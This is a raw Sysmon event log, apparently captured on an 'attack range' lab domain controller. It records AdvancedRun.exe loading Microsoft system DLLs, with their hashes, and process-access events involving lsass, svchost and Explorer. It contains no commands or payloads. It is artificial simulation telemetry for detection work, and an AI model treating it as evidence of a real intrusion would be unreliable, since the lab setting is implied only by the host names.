18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003988604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.911{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.911{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.818{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.818{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® 
C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.802{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.787{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003988598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003988597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003988596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003988595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.755{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003988594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 